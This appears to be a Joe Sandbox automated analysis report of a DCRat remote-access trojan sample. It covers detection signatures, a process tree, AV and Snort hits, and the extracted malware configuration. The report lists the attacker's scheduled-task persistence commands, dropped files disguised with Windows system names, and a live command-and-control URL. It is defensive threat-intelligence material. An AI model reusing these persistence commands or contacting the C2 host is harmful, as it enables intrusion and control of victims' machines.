Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hx1hwVZIjy.exe

Overview

General Information

Sample name:hx1hwVZIjy.exe
renamed because original name is a hash value
Original sample name:48e5ef4a0ca234c29ceecab25fe23d91.exe
Analysis ID:1428549
MD5:48e5ef4a0ca234c29ceecab25fe23d91
SHA1:058fec1d069ba2dd6f7ef3af7ff65066b5b9f7b9
SHA256:0641afd15fce62b273a73f7c8df67b4f192c4056ec788937d6d52a2e814c2ddc
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • hx1hwVZIjy.exe (PID: 4592 cmdline: "C:\Users\user\Desktop\hx1hwVZIjy.exe" MD5: 48E5EF4A0CA234C29CEECAB25FE23D91)
    • wscript.exe (PID: 6396 cmdline: "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3168 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • brokercrt.exe (PID: 2464 cmdline: "C:\ReviewHost\brokercrt.exe" MD5: 96B975481850ADD8CCB0353227ECEB87)
          • schtasks.exe (PID: 5996 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2700 cmdline: schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\user\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5896 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5528 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6008 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ReviewHost\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3140 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\ReviewHost\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3872 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2668 cmdline: schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5948 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6556 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 8 /tr "'C:\Users\Default\WinStore.App.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6532 cmdline: schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Users\Default\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4208 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 5 /tr "'C:\Users\Default\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2436 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2452 cmdline: schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4220 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4320 cmdline: schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\wininit.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3528 cmdline: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\wininit.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4164 cmdline: schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\wininit.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6052 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3624 cmdline: schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6252 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4768 cmdline: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Recovery\smss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5516 cmdline: schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\smss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7044 cmdline: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Recovery\smss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5036 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1264 cmdline: schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6332 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1088 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4592 cmdline: schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1436 cmdline: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3176 cmdline: schtasks.exe /create /tn "cscriptc" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6536 cmdline: schtasks.exe /create /tn "cscript" /sc ONLOGON /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2104 cmdline: schtasks.exe /create /tn "cscriptc" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • AFKwztugVSPq.exe (PID: 2828 cmdline: "C:\Users\Default User\Recent\AFKwztugVSPq.exe" MD5: 96B975481850ADD8CCB0353227ECEB87)
  • AFKwztugVSPq.exe (PID: 7084 cmdline: C:\Users\Public\Videos\AFKwztugVSPq.exe MD5: 96B975481850ADD8CCB0353227ECEB87)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"6\":\"@\",\"F\":\")\",\"h\":\"$\",\"k\":\"&\",\"i\":\"!\",\"I\":\"^\",\"1\":\"#\",\"e\":\"_\",\"W\":\"*\",\"0\":\"~\",\"C\":\"(\",\"J\":\"|\",\"c\":\",\",\"D\":\";\",\"S\":\"-\",\"L\":\"`\",\"5\":\".\",\"X\":\"<\",\"B\":\">\",\"o\":\" \",\"V\":\"%\"}", "PCRT": "{\"c\":\"`\",\"p\":\"@\",\"b\":\"#\",\"w\":\",\",\"Q\":\"%\",\"S\":\"*\",\"D\":\"$\",\"I\":\"!\",\"i\":\">\",\"x\":\")\",\"X\":\"<\",\"M\":\"&\",\"l\":\"|\",\"y\":\"_\",\"f\":\" \",\"j\":\".\",\"0\":\"~\",\"=\":\"-\",\"e\":\"^\",\"6\":\"(\"}", "TAG": "", "MUTEX": "DCR_MUTEX-eLPnwKR5eZjrErjCXdn5", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0945069.xsph.ru/@==gbJBzYuFDT", "H2": "http://a0945069.xsph.ru/@==gbJBzYuFDT", "T": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000023.00000002.2214435641.0000000002531000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000023.00000002.2214435641.0000000002527000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000005.00000002.2112725978.0000000003397000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000023.00000002.2214435641.00000000024E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000025.00000002.2214490270.0000000002B01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 4 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Execution from Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\Recent\AFKwztugVSPq.exe", CommandLine: "C:\Users\Default User\Recent\AFKwztugVSPq.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Users\Default User\Recent\AFKwztugVSPq.exe", ProcessId: 2828, ProcessName: AFKwztugVSPq.exe
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ReviewHost\brokercrt.exe, ProcessId: 2464, TargetFilename: C:\ReviewHost\conhost.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /f, CommandLine: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ReviewHost\brokercrt.exe", ParentImage: C:\ReviewHost\brokercrt.exe, ParentProcessId: 2464, ParentProcessName: brokercrt.exe, ProcessCommandLine: schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /f, ProcessId: 6052, ProcessName: schtasks.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\hx1hwVZIjy.exe", ParentImage: C:\Users\user\Desktop\hx1hwVZIjy.exe, ParentProcessId: 4592, ParentProcessName: hx1hwVZIjy.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe" , ProcessId: 6396, ProcessName: wscript.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Schedule system process
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\conhost.exe'" /f, CommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\conhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ReviewHost\brokercrt.exe", ParentImage: C:\ReviewHost\brokercrt.exe, ParentProcessId: 2464, ParentProcessName: brokercrt.exe, ProcessCommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\conhost.exe'" /f, ProcessId: 5528, ProcessName: schtasks.exe

            Snort Signatures

            Timestamp:04/19/24-07:38:11.754913
            SID:2850862
            Source Port:80
            Destination Port:49704
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: hx1hwVZIjy.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Windows\Containers\serviced\wininit.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ReviewHost\brokercrt.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Recovery\smss.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\bWPufSNCBJ.batAvira: detection malicious, Label: BAT/Delbat.C
            Source: C:\ReviewHost\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\Default\WinStore.App.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ReviewHost\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Found malware configuration
            Source: 00000023.00000002.2214435641.00000000024E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"6\":\"@\",\"F\":\")\",\"h\":\"$\",\"k\":\"&\",\"i\":\"!\",\"I\":\"^\",\"1\":\"#\",\"e\":\"_\",\"W\":\"*\",\"0\":\"~\",\"C\":\"(\",\"J\":\"|\",\"c\":\",\",\"D\":\";\",\"S\":\"-\",\"L\":\"`\",\"5\":\".\",\"X\":\"<\",\"B\":\">\",\"o\":\" \",\"V\":\"%\"}", "PCRT": "{\"c\":\"`\",\"p\":\"@\",\"b\":\"#\",\"w\":\",\",\"Q\":\"%\",\"S\":\"*\",\"D\":\"$\",\"I\":\"!\",\"i\":\">\",\"x\":\")\",\"X\":\"<\",\"M\":\"&\",\"l\":\"|\",\"y\":\"_\",\"f\":\" \",\"j\":\".\",\"0\":\"~\",\"=\":\"-\",\"e\":\"^\",\"6\":\"(\"}", "TAG": "", "MUTEX": "DCR_MUTEX-eLPnwKR5eZjrErjCXdn5", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0945069.xsph.ru/@==gbJBzYuFDT", "H2": "http://a0945069.xsph.ru/@==gbJBzYuFDT", "T": "0"}
            Multi AV Scanner detection for dropped file
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeVirustotal: Detection: 78%Perma Link
            Source: C:\Recovery\smss.exeReversingLabs: Detection: 87%
            Source: C:\Recovery\smss.exeVirustotal: Detection: 78%Perma Link
            Source: C:\ReviewHost\AFKwztugVSPq.exeReversingLabs: Detection: 87%
            Source: C:\ReviewHost\AFKwztugVSPq.exeVirustotal: Detection: 78%Perma Link
            Source: C:\ReviewHost\RuntimeBroker.exeReversingLabs: Detection: 87%
            Source: C:\ReviewHost\RuntimeBroker.exeVirustotal: Detection: 78%Perma Link
            Source: C:\ReviewHost\brokercrt.exeReversingLabs: Detection: 87%
            Source: C:\ReviewHost\brokercrt.exeVirustotal: Detection: 78%Perma Link
            Source: C:\ReviewHost\conhost.exeReversingLabs: Detection: 87%
            Source: C:\ReviewHost\conhost.exeVirustotal: Detection: 78%Perma Link
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeReversingLabs: Detection: 87%
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeVirustotal: Detection: 78%Perma Link
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exeReversingLabs: Detection: 87%
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exeVirustotal: Detection: 78%Perma Link
            Source: C:\Users\Default\WinStore.App.exeReversingLabs: Detection: 87%
            Source: C:\Users\Default\WinStore.App.exeVirustotal: Detection: 78%Perma Link
            Source: C:\Users\Public\AFKwztugVSPq.exeReversingLabs: Detection: 87%
            Source: C:\Users\Public\AFKwztugVSPq.exeVirustotal: Detection: 78%Perma Link
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeReversingLabs: Detection: 87%
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeVirustotal: Detection: 78%Perma Link
            Source: C:\Users\user\AFKwztugVSPq.exeReversingLabs: Detection: 87%
            Source: C:\Users\user\AFKwztugVSPq.exeVirustotal: Detection: 78%Perma Link
            Source: C:\Windows\Containers\serviced\wininit.exeReversingLabs: Detection: 87%
            Source: C:\Windows\Containers\serviced\wininit.exeVirustotal: Detection: 78%Perma Link
            Multi AV Scanner detection for submitted file
            Source: hx1hwVZIjy.exeVirustotal: Detection: 61%Perma Link
            Source: hx1hwVZIjy.exeReversingLabs: Detection: 73%
            Machine Learning detection for dropped file
            Source: C:\Windows\Containers\serviced\wininit.exeJoe Sandbox ML: detected
            Source: C:\ReviewHost\brokercrt.exeJoe Sandbox ML: detected
            Source: C:\Recovery\smss.exeJoe Sandbox ML: detected
            Source: C:\ReviewHost\conhost.exeJoe Sandbox ML: detected
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeJoe Sandbox ML: detected
            Source: C:\Users\Default\WinStore.App.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeJoe Sandbox ML: detected
            Source: C:\ReviewHost\RuntimeBroker.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: hx1hwVZIjy.exeJoe Sandbox ML: detected
            Source: hx1hwVZIjy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: hx1hwVZIjy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: hx1hwVZIjy.exe
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F3A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00F3A5F4
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F4B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00F4B8E0
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F5AAA8 FindFirstFileExA,0_2_00F5AAA8
            Source: C:\ReviewHost\brokercrt.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile opened: C:\Users\userJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 141.8.192.217:80 -> 192.168.2.5:49704
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://a0945069.xsph.ru/@==gbJBzYuFDT
            Source: brokercrt.exe, 00000005.00000002.2112725978.00000000033BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F3718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00F3718C
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Windows\Containers\serviced\wininit.exeJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Windows\Containers\serviced\56085415360792Jump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F3857B0_2_00F3857B
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F470BF0_2_00F470BF
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F3407E0_2_00F3407E
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F5D00E0_2_00F5D00E
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F611940_2_00F61194
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F502F60_2_00F502F6
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F3E2A00_2_00F3E2A0
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F332810_2_00F33281
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F466460_2_00F46646
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F327E80_2_00F327E8
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F437C10_2_00F437C1
